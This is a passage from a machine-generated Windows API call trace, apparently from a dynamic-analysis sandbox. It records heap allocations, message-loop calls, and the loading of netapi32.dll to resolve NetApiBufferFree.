hHeap=0xbe0000) returned 1 [0248.512] FreeLibrary (hLibModule=0x74480000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532e0 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532d0 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8a0 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c10 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6708 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c58 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c40 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6738 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a48 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b50 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ad8 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a90 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6588 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8aa8 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d878 | out: hHeap=0xbe0000) returned 1 [0248.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53310 | out: hHeap=0xbe0000) returned 1 [0248.515] PeekMessageW (in: lpMsg=0x8be964, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8be964) returned 0 [0248.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53310 [0248.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe67e90 [0248.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53300 [0248.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67e90 | out: hHeap=0xbe0000) returned 1 [0248.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40b10 [0248.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532d0 [0248.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532d0 | out: hHeap=0xbe0000) returned 1 [0248.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532d0 [0248.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40ab0 [0248.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532d0 | out: hHeap=0xbe0000) returned 1 [0248.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40ab0 | out: hHeap=0xbe0000) returned 1 [0248.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40b10 | out: hHeap=0xbe0000) returned 1 [0248.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53310 | out: hHeap=0xbe0000) returned 1 [0248.516] PeekMessageW (in: lpMsg=0x8be964, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8be964) returned 1 [0248.516] TranslateMessage (lpMsg=0x8be964) returned 0 [0248.517] DispatchMessageW (lpMsg=0x8be964) returned 0xffffffff [0248.517] GetForegroundWindow () returned 0x10058 [0248.517] GetWindowLongW (hWnd=0x10058, nIndex=-21) returned 0 [0248.517] PeekMessageW (in: lpMsg=0x8be964, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8be964) returned 0 [0248.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53310 [0248.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53310 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe016a0 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8be0 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d828 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8910 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf63d8 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6408 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67c70 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c28 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d850 | out: hHeap=0xbe0000) returned 1 [0248.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bb0 | out: hHeap=0xbe0000) returned 1 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d7d8 | out: hHeap=0xbe0000) returned 1 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66a8 | out: hHeap=0xbe0000) returned 1 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d800 | out: hHeap=0xbe0000) returned 1 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66a8 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bb0 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53320 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d800 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bb0 | out: hHeap=0xbe0000) returned 1 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66a8 | out: hHeap=0xbe0000) returned 1 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66a8 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66a8 | out: hHeap=0xbe0000) returned 1 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53390 | out: hHeap=0xbe0000) returned 1 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66a8 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53390 [0248.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53390 | out: hHeap=0xbe0000) returned 1 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x14) returned 0xe40af0 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53390 [0248.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d7d8 [0248.519] CharLowerBuffW (in: lpsz="wchar[40]", cchLength=0x9 | out: lpsz="wchar[40]") returned 0x9 [0248.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xe08928 [0248.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bb0 [0248.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533a0 [0248.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0248.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6408 [0248.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53330 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6408 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c28 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d7d8 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53390 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d800 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bc8 | out: hHeap=0xbe0000) returned 1 [0248.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66a8 | out: hHeap=0xbe0000) returned 1 [0248.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d7b0 | out: hHeap=0xbe0000) returned 1 [0248.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.520] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d7b0 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66a8 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53380 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bc8 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53320 [0248.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d800 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53390 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x14) returned 0xe40b10 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xe08988 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53390 | out: hHeap=0xbe0000) returned 1 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53390 [0248.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53390 | out: hHeap=0xbe0000) returned 1 [0248.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x52) returned 0xdba930 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6408 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d7d8 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53390 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdba930 | out: hHeap=0xbe0000) returned 1 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c28 | out: hHeap=0xbe0000) returned 1 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08988 | out: hHeap=0xbe0000) returned 1 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40b10 | out: hHeap=0xbe0000) returned 1 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d800 | out: hHeap=0xbe0000) returned 1 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.521] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d800 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53320 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53320 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63d8 [0248.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53320 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8910 [0248.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8be0 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53320 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8aa8 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53320 [0248.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53320 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6588 [0248.522] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a90 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ad8 [0248.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a90 | out: hHeap=0xbe0000) returned 1 [0248.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ad8 | out: hHeap=0xbe0000) returned 1 [0248.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d850 [0248.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ad8 [0248.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53330 [0248.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a90 [0248.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ad8 | out: hHeap=0xbe0000) returned 1 [0248.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a90 | out: hHeap=0xbe0000) returned 1 [0248.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0248.523] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x744a0000 [0248.533] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.533] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53330 [0248.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0248.533] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x11) returned 0xe40b10 [0248.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0xe40b10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferFree", lpUsedDefaultChar=0x0) returned 17 [0248.533] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8ac0 | out: hHeap=0xbe0000) returned 1 [0248.533] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d828 [0248.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40b10 | out: hHeap=0xbe0000) returned 1 [0248.534] GetProcAddress (hModule=0x744a0000, lpProcName="NetApiBufferFree") returned 0x744913d2 [0248.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d828 | out: hHeap=0xbe0000) returned 1 [0248.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0248.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d828 [0248.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53330 [0248.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0248.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d828 | out: hHeap=0xbe0000) returned 1 [0248.534] NetApiBufferFree (Buffer=0xe08b68) returned 0x0 [0248.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53330 [0248.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe67c70 [0248.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53340 [0248.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a60 [0248.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a78 [0248.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6528 [0248.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53310 [0248.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6528 | out: hHeap=0xbe0000) returned 1 [0248.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53310 | out: hHeap=0xbe0000) returned 1 [0248.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a78 | out: hHeap=0xbe0000) returned 1 [0248.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a78 [0248.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6528 [0248.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a30 [0248.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53310 [0248.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a30 | out: hHeap=0xbe0000) returned 1 [0248.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53310 | out: hHeap=0xbe0000) returned 1 [0248.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6528 | out: hHeap=0xbe0000) returned 1 [0248.535] FreeLibrary (hLibModule=0x744a0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d850 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6588 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53320 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf63d8 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c28 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8910 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8be0 | out: hHeap=0xbe0000) returned 1 [0248.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8aa8 | out: hHeap=0xbe0000) returned 1 [0248.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d800 | out: hHeap=0xbe0000) returned 1 [0248.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a60 | out: hHeap=0xbe0000) returned 1 [0248.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a78 | out: hHeap=0xbe0000) 